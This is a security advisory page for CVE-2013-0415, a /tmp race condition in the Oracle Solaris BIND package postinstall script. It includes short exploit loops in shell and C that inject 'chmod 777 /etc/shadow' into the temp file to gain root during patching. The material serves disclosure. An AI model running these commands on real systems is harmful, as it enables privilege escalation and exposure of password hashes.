Oracle Solaris Bind/Postinstall script for Bind package local root

2018.10.05
Risk: Medium
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 6/10
Impact Subscore: 10/10
Exploitability Subscore: 1.5/10
Exploit range: Local
Attack complexity: High
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Title: Oracle Solaris Bind/Postinstall script for Bind package local root Author: Larry W. Cashdollar, @_larry0 Date: 2013-01-14 CVE-ID:[CVE-2013-0415] Download Site: www.oracle.com Vendor: Oracle Systems Vendor Notified: 2013-01-15 Vendor Contact: security@oracle.com Advisory: http://www.vapid.dhs.org/advisories/solaris_patch_cluster_race.html Description: Solaris Sparc patch cluster January 2013. Vulnerability: If the system administrator is updating the system using update manager or smpatch (multi user mode) a race condition exists with the postinstall script for SUNWbindr that may lead to arbitrary code execution as root if the race is won. vulnerable code in: ./patches/119784-22/SUNWbindr/install/pkg_postinstall: UPGRADE=${TMP}/BIND_UPGRADE ./patches/119784-22/SUNWbindr/install/postinstall: UPGRADE=${TMP}/BIND_UPGRADE vulnerable code: UPGRADE=${TMP}/BIND_UPGRADE rm -f $UPGRADE (If I create the file first between these two steps, I should have ownership before it is over written and inject malicious code to get root.) cat >> $UPGRADE <<-\UPDATESTART_METHOD oset=$@ # Remember current options if any. svc="svc:network/dns/server" if [ -z "$TMP" ]; then TMP="/tmp" fi Export: JSON TEXT XML Exploit Code: If the following is run: while (true) ; do touch /tmp/BIND_UPGRADE ;echo "chmod 777 /etc/shadow" > /tmp/BIND_UPGRADE; done during patch installation you can get /etc/shadow world writeable. Vladz suggested: Another approach to exploit this is to place your evil command in a file called /tmp/BIND_UPGRADE.new, and loop the move command. $ while ! mv /tmp/BIND_UPGRADE.new /tmp/BIND_UPGRADE 2>/dev/null; do continue; done or in C: while (rename("/tmp/BIND_UPGRADE.new", "/tmp/BIND_UPGRADE") != 0) continue; I am telling this because I think that moving a file takes less syscalls (one at least) than a "echo string >> file" that open(), write() and close() the file.

References:

http://www.vapidlabs.com/advisory.php?v=41


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top